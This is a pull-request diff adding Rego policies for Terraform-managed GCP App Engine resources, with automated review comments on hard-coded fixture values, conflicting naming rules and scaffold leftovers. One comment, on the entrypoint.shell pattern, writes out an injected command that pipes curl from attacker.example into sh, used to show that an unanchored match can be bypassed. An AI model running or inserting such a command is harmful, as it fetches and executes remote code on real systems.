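Review bot: The service policy for `google_app_engine_service_network_settings` hard-codes a single literal, `"values": ["app-internal-service"]`, which looks like a fixture value rather than an organisational convention: any real service name, including ones that satisfy the `default` / `hh-*` rule enforced on the version resources in this same PR, will be flagged here. If the naming standard is `default` or `hh-*`, reuse the same `pattern whitelist` here so the same `service` attribute is judged by one rule across resources; if the literal is intentional, the `remedies` text "such as 'app-internal-service'" should not imply there are other approved values when the whitelist has exactly one.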
diff --git a/policies/gcp/app_engine/app_engine_service_split_traffic/migrate_traffic/policy.rego b/policies/gcp/app_engine/app_engine_service_split_traffic/migrate_traffic/policy.rego new file mode 100644 index 000000000..4271211ca --- /dev/null +++ b/policies/gcp/app_engine/app_engine_service_split_traffic/migrate_traffic/policy.rego @@ -0,0 +1,22 @@ +package terraform.gcp.security.app_engine.app_engine_service_split_traffic.migrate_traffic + +import data.terraform.helpers +import data.terraform.gcp.security.app_engine.app_engine_service_split_traffic.vars + +conditions := [ + [ + { + "situation_description": "Traffic is being migrated immediately, bypassing the split configuration", + "remedies": ["Have migrate_traffic set to 'false' to respect the defined version allocations"] + }, + { + "condition": "ensure traffic split is respected", + "attribute_path": ["migrate_traffic"], + "values": [false], + "policy_type": "whitelist" + } + ] +] + +message := helpers.get_multi_summary(conditions, vars.variables).message +details := helpers.get_multi_summary(conditions, vars.variables).details \ No newline at end of file diff --git a/policies/gcp/app_engine/app_engine_service_split_traffic/service/policy.rego b/policies/gcp/app_engine/app_engine_service_split_traffic/service/policy.rego new file mode 100644 index 000000000..e19f7de41 --- /dev/null +++ b/policies/gcp/app_engine/app_engine_service_split_traffic/service/policy.rego 
@@ -0,0 +1,22 @@ +package terraform.gcp.security.app_engine.app_engine_service_split_traffic.service + +import data.terraform.helpers +import data.terraform.gcp.security.app_engine.app_engine_service_split_traffic.vars + +conditions := [ + [ + { + "situation_description": "Traffic splitting is applied to an unapproved service", + "remedies": ["Set the service name to an approved value such as 'hardhat-main-api'"] + }, + { + "condition": "Check service against approved whitelist", + "attribute_path": ["service"], + "values": ["hardhat-main-api"], + "policy_type": "whitelist" + } + ] +] + +message := helpers.get_multi_summary(conditions, vars.variables).message +details := helpers.get_multi_summary(conditions, vars.variables).details \ No newline at end of file diff --git a/policies/gcp/app_engine/app_engine_service_split_traffic/split/allocations/policy.rego b/policies/gcp/app_engine/app_engine_service_split_traffic/split/allocations/policy.rego new file mode 100644 index 000000000..af4572072 --- /dev/null +++ b/policies/gcp/app_engine/app_engine_service_split_traffic/split/allocations/policy.rego @@ -0,0 +1,22 @@ +package terraform.gcp.security.app_engine.app_engine_service_split_traffic.allocations + +import data.terraform.helpers +import data.terraform.gcp.security.app_engine.app_engine_service_split_traffic.vars + +conditions := [ + [ + { + "situation_description": "Version 'v1' is receiving an unapproved amount of traffic", + "remedies": ["ensure 'v1' allocation is set to a standard split (e.g. 0.5 or 0.8)"] + }, + { + "condition": "Check v1 traffic allocation", + "attribute_path": ["split", 0, "allocations", "v1"], + "values": [0.01, 0.99], + "policy_type": "range" + } + ] +] + +message := helpers.get_multi_summary(conditions, vars.variables).message +details := helpers.get_multi_summary(conditions, vars.variables).details \ No newline at end of file 
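Review bot: The `migrate_traffic` policy's `situation_description` ("Traffic is being migrated immediately, bypassing the split configuration") misstates the flag: `migrate_traffic = true` is App Engine's gradual traffic migration, which only works with a single target version in `allocations`, so it does not jump immediately and it does not override a multi-version split so much as require there not be one. Reword to what is actually being enforced (for example "gradual traffic migration is disabled so allocations are applied as written"). Also, `false` is the provider default, so an unset attribute may be absent from the plan; please confirm `helpers.get_multi_summary` treats a missing `migrate_traffic` as compliant rather than as a whitelist miss.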
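Review bot: The allocations policy assumes a version literally named `v1` (`"attribute_path": ["split", 0, "allocations", "v1"]`), so it says nothing about any other version id and will either error or flag every split that does not contain a `v1` key, depending on how the helper handles a missing path. The `range` of `[0.01, 0.99]` also contradicts the `remedies` text ("a standard split (e.g. 0.5 or 0.8)"), and it rejects the one state every rollout ends in: `v1 = 1.0` once the version is fully promoted. Either state a real invariant (allocations sum to 1, no single key is hard-coded) or narrow the description and remedy to what the range actually checks.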
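Review bot: Same concern as the network-settings service rule: `"values": ["hardhat-main-api"]` pins the split-traffic policy to one literal service name that does not match the `default` / `hh-*` convention enforced on `google_app_engine_standard_app_version` and `google_app_engine_flexible_app_version` in this PR, so a version that passes its own naming check cannot have a compliant traffic split. Reuse the shared pattern whitelist here, or document why traffic splitting is only permitted on this one service.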
diff --git a/policies/gcp/app_engine/app_engine_service_split_traffic/split/shard_by/policy.rego b/policies/gcp/app_engine/app_engine_service_split_traffic/split/shard_by/policy.rego new file mode 100644 index 000000000..5592a74c6 --- /dev/null +++ b/policies/gcp/app_engine/app_engine_service_split_traffic/split/shard_by/policy.rego @@ -0,0 +1,22 @@ +package terraform.gcp.security.app_engine.app_engine_service_split_traffic.shard_by + +import data.terraform.helpers +import data.terraform.gcp.security.app_engine.app_engine_service_split_traffic.vars + +conditions := [ + [ + { + "situation_description": "Traffic sharding mechanism is unstable/unspecified", + "remedies": ["Need to set split.shard_by to 'IP' or 'COOKIE' to ensure stable session routing"] + }, + { + "condition": "Whitelist stable sharding mechanisms", + "attribute_path": ["split", 0, "shard_by"], + "values": ["IP", "COOKIE"], + "policy_type": "whitelist" + } + ] +] + +message := helpers.get_multi_summary(conditions, vars.variables).message +details := helpers.get_multi_summary(conditions, vars.variables).details \ No newline at end of file diff --git a/policies/gcp/app_engine/app_engine_service_split_traffic/vars.rego b/policies/gcp/app_engine/app_engine_service_split_traffic/vars.rego new file mode 100644 index 000000000..440a51f64 --- /dev/null +++ b/policies/gcp/app_engine/app_engine_service_split_traffic/vars.rego @@ -0,0 +1,8 @@ +package terraform.gcp.security.app_engine.app_engine_service_split_traffic.vars + + +variables := { + "friendly_resource_name": "App Engine Service Split Traffic", # eg., "GCS Bucket", + "resource_type": "google_app_engine_service_split_traffic", # eg., "google_storage_bucket" + "resource_value_name" : "name" # eg., "name" +} \ No newline at end of file 
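Review bot: In the `shard_by` policy the `remedies` entry reads like a note to self ("Need to set split.shard_by to ..."); make it an instruction like the other rules ("Set `split.shard_by` to 'IP' or 'COOKIE'"). The whitelist deliberately excludes `RANDOM` and the unspecified value; a short comment saying that sticky routing is the goal (so that a canary version receives a consistent subset of clients) would make the rationale reviewable, since sharding is a rollout-safety control rather than an access control and that is not obvious from "unstable/unspecified".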
diff --git a/policies/gcp/app_engine/app_engine_standard_app_version/deployment/zip/source_url/policy.rego b/policies/gcp/app_engine/app_engine_standard_app_version/deployment/zip/source_url/policy.rego new file mode 100644 index 000000000..ef0250986 --- /dev/null +++ b/policies/gcp/app_engine/app_engine_standard_app_version/deployment/zip/source_url/policy.rego @@ -0,0 +1,22 @@ +package terraform.gcp.security.app_engine.app_engine_standard_app_version.deployment.zip.source_url + +import data.terraform.helpers +import data.terraform.gcp.security.app_engine.app_engine_standard_app_version.vars + +conditions := [ + [ + { + "situation_description": "App Engine Standard application code is being deployed via an unauthorized source URL", + "remedies": ["Ensure to set 'deployment.zip.source_url' to the authorized GCS URL"] + }, + { + "condition": "Match against exact approved deployment URLs", + "attribute_path": ["deployment", 0, "zip", 0, "source_url"], + "values": ["https://storage.googleapis.com/appengine-static-content/hello-world.zip"], + "policy_type": "whitelist" + } + ] +] + +message := helpers.get_multi_summary(conditions, vars.variables).message +details := helpers.get_multi_summary(conditions, vars.variables).details \ No newline at end of file diff --git a/policies/gcp/app_engine/app_engine_standard_app_version/entrypoint/shell/policy.rego b/policies/gcp/app_engine/app_engine_standard_app_version/entrypoint/shell/policy.rego new file mode 100644 index 000000000..8df765b5e --- /dev/null +++ b/policies/gcp/app_engine/app_engine_standard_app_version/entrypoint/shell/policy.rego 
@@ -0,0 +1,22 @@ +package terraform.gcp.security.app_engine.app_engine_standard_app_version.entrypoint.shell + +import data.terraform.helpers +import data.terraform.gcp.security.app_engine.app_engine_standard_app_version.vars + +conditions := [ + [ + { + "situation_description": "The App Engine Standard entrypoint is using an unapproved runtime/file structure", + "remedies": ["Follow the format 'node ./app.js' or 'python ./main.py'"] + }, + { + "condition": "Whitelist approved shell execution patterns", + "attribute_path": ["entrypoint", 0, "shell"], + "values": ["*/*", [ ["node .", "python ."], ["app.js", "server.js", "main.py"] ]], + "policy_type": "pattern whitelist" + } + ] +] + +message := helpers.get_multi_summary(conditions, vars.variables).message +details := helpers.get_multi_summary(conditions, vars.variables).details \ No newline at end of file diff --git a/policies/gcp/app_engine/app_engine_standard_app_version/instance_class/policy.rego b/policies/gcp/app_engine/app_engine_standard_app_version/instance_class/policy.rego new file mode 100644 index 000000000..ed053e2b9 --- /dev/null +++ b/policies/gcp/app_engine/app_engine_standard_app_version/instance_class/policy.rego 
@@ -0,0 +1,36 @@ +package terraform.gcp.security.app_engine.app_engine_standard_app_version.instance_class + +import data.terraform.helpers +import data.terraform.gcp.security.app_engine.app_engine_standard_app_version.vars + +conditions := [ + # scenario 1: + [ + { + "situation_description": "The App Engine service name is not approved.", + "remedies": ["Set 'service' to 'prod-web'."] + }, + { + "condition": "Whitelist service names", + "attribute_path": ["service"], + "values": ["prod-web"], + "policy_type": "whitelist" + } + ], + # scenario 2 + [ + { + "situation_description": "The Instance Class is not approved.", + "remedies": ["Set 'instance_class' to 'F1'."] + }, + { + "condition": "Whitelist instance classes", + "attribute_path": ["instance_class"], + "values": ["F1"], + "policy_type": "whitelist" + } + ] +] + +message := helpers.get_multi_summary(conditions, vars.variables).message +details := helpers.get_multi_summary(conditions, vars.variables).details \ No newline at end of file diff --git a/policies/gcp/app_engine/app_engine_standard_app_version/runtime/policy.rego b/policies/gcp/app_engine/app_engine_standard_app_version/runtime/policy.rego new file mode 100644 index 000000000..e4bc8242e --- /dev/null +++ b/policies/gcp/app_engine/app_engine_standard_app_version/runtime/policy.rego 
@@ -0,0 +1,22 @@ +package terraform.gcp.security.app_engine.app_engine_standard_app_version.runtime + +import data.terraform.helpers +import data.terraform.gcp.security.app_engine.app_engine_standard_app_version.vars + +conditions := [ + [ + { + "situation_description": "App Engine Standard runtime is using an unapproved/deprecated language version", + "remedies": ["set the 'runtime' attribute to an approved version (e.g. 'nodejs20', 'python311' or 'java17')"] + }, + { + "condition": "Whitelist approved Standard runtimes", + "attribute_path": ["runtime"], + "values": ["nodejs20", "python311", "java17"], + "policy_type": "whitelist" + } + ] +] + +message := helpers.get_multi_summary(conditions, vars.variables).message +details := helpers.get_multi_summary(conditions, vars.variables).details \ No newline at end of file diff --git a/policies/gcp/app_engine/app_engine_standard_app_version/service/policy.rego b/policies/gcp/app_engine/app_engine_standard_app_version/service/policy.rego new file mode 100644 index 000000000..0576db509 --- /dev/null +++ b/policies/gcp/app_engine/app_engine_standard_app_version/service/policy.rego @@ -0,0 +1,22 @@ +package terraform.gcp.security.app_engine.app_engine_standard_app_version.service + +import data.terraform.helpers +import data.terraform.gcp.security.app_engine.app_engine_standard_app_version.vars + +conditions := [ + [ + { + "situation_description": "App Engine Standard service name does not follow the naming standards required", + "remedies": ["Rename the service to 'default' or a name starting with 'hh-' (e.g., 'hh-frontend')"] + }, + { + "condition": "Check if service name is 'default' or prefixed with 'hh-'", + "attribute_path": ["service"], + "values": ["*", [["default", "hh-*"]]], + "policy_type": "pattern whitelist" + } + ] +] + +message := helpers.get_multi_summary(conditions, vars.variables).message +details := helpers.get_multi_summary(conditions, vars.variables).details \ No newline at end of file 
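Review bot: The `source_url` whitelist pins deployments to `https://storage.googleapis.com/appengine-static-content/hello-world.zip`, which is the sample artifact from the provider documentation, not an artifact this project controls. As written, every real deployment is non-compliant and the only "authorized" code is a public object in a bucket owned by someone else, which is the opposite of a supply-chain control. Replace it with a `pattern whitelist` on the organisation's own artifact bucket (for example a prefix under `https://storage.googleapis.com/<org-bucket>/`), and note in the remedy that an exact URL only guarantees content if the bucket is versioned or retention-locked; otherwise the object can be overwritten in place and the pin proves nothing.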
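Review bot: The `entrypoint.shell` pattern `["*/*", [ ["node .", "python ."], ["app.js", "server.js", "main.py"] ]]` appears to be a cross product of prefixes and filenames, which admits nonsensical combinations such as `python ./app.js` and `node ./main.py` alongside the intended ones. More importantly for a shell-command check, please confirm the helper anchors the match at the end of the string: if `node ./app.js` is accepted as a prefix, then `node ./app.js; curl attacker.example | sh` passes too, and the rule gives a false sense of having constrained the entrypoint. List the exact approved command strings, or use a pattern that is anchored at both ends, and rename the description, since "runtime/file structure" is not what the rule tests.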
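Review bot: Scenario 1 in the `instance_class` policy requires `service` to be exactly `"prod-web"`, while the standard-app-version `service` policy in this PR requires the same attribute to be `default` or `hh-*`. `prod-web` matches neither, so no `google_app_engine_standard_app_version` can satisfy both rules and every resource will produce at least one finding. Drop scenario 1 from `instance_class/policy.rego` (the service check already has its own file) or align the two value sets. For scenario 2, note that `F1` is an automatic-scaling class; if any service in scope uses basic or manual scaling it needs a `B*` class, so either add those or say in the description that only automatic scaling is permitted.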
diff --git a/policies/gcp/app_engine/app_engine_standard_app_version/vars.rego b/policies/gcp/app_engine/app_engine_standard_app_version/vars.rego new file mode 100644 index 000000000..8c51b8cb1 --- /dev/null +++ b/policies/gcp/app_engine/app_engine_standard_app_version/vars.rego @@ -0,0 +1,8 @@ +package terraform.gcp.security.app_engine.app_engine_standard_app_version.vars + + +variables := { + "friendly_resource_name": "App Engine Standard App Version", # eg., "GCS Bucket", + "resource_type": "google_app_engine_standard_app_version", # eg., "google_storage_bucket" + "resource_value_name" : "name" # eg., "name" +} \ No newline at end of file
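Review bot: The four `vars.rego` files still carry the scaffold comments (`# eg., "GCS Bucket",`, `# eg., "google_storage_bucket"`, `# eg., "name"`) and all set `"resource_value_name" : "name"`. None of these resources takes a `name` argument: `google_app_engine_service_network_settings` and `google_app_engine_service_split_traffic` are keyed by `service`, and the two app-version resources by `service` plus `version_id`, with `name` only as a computed output that is unknown at plan time. Please check how `helpers.get_multi_summary` uses `resource_value_name` to label a finding; if it reads the attribute from the plan, findings will come out unnamed, and `service` (or `version_id`) is the attribute that identifies the resource. Either way, remove the template comments before merge.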